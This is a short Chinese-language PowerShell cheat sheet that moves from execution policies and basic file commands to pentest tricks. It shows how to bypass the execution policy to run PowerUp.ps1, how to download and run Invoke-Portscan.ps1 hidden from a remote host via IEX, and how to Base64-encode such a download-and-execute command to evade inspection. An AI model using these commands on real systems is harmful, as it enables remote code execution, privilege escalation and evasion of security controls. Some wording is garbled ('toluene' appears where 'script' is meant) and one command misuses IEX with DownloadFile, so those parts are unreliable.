执行策略
如果PowerShell脚本无法运行,可以使用Get-ExecutionPolicy查询当前的执行策略
- Restricted:脚本不能运行(默认配置)
- RemoteSigned:在本地创建的基甲苯可以运行,但从网上下载的脚本不能运行(有数字证书的除外)
- AllSigned:仅当脚本由收信人的发布者签名时才能运行
- Unrestricted:允许所有脚本运行
可以使用Set-ExecutionPolicy <policy name>来设置PowerShell的执行策略
Set-ExecutionPolicy Unrestricted
常用命令
- 新建目录:
New-Item directory -ItemType Directory - 新建文件:
New-Item test.txt -ItemType File - 删除目录:
Remove-Item directory - 显示文本内容:
Get-Content test.txt - 设置文本内容:
Set-Content test.txt -Value "I love you" - 追加内容:
Add-Content test.txt -Value "I love you too" - 清除内容:
Clear-Content test.txt
- 绕过本地权限并执行
powershell.exe -ExecutionPolicy Bypass -File .\PowerUp.ps1
powershell.exe -exec Bypass -Command "& {Import-Module C:\Users\Jonathan\Desktop\PowerUp.ps1; Invoke-AllChecks}"
- 从网站服务器中下载脚本,绕过本地权限并隐藏执行
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).Downloadfile('http://192.168.62.130/Inv
oke-Portscan.ps1','Invoke-Portscan.ps1')";Import-Module .\Invoke-Portscan.ps1;Invoke-Portscan -Hosts 192.168.62.130
- 使用Base64对PowerShell命令进行编码
echo "iex(New-Object Net.WebClient).DownloadString('http://192.168.62.130/Invoke-Portsc
an.ps1');Invoke-Portscan -Hosts 192.168.1.1/24" > raw.txt
./ps_encoder.py -s raw.txt
powershell.exe -exec bypass -enc aQBlAHgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADEAOQAyAC4AMQA2ADgALgA2ADIALgAxADMAMAAvAEkAbgB2AG8AawBlAC0AUABvAHIAdABzAGMAYQBuAC4AcABzADEAJwApADsASQBuAHYAbwBrAGUALQBQAG8AcgB0AHMAYwBhAG4AIAAtAEgAbwBzAHQAcwAgADEAOQAyAC4AMQA2ADgALgAxAC4AMQAvADIANAAKAA==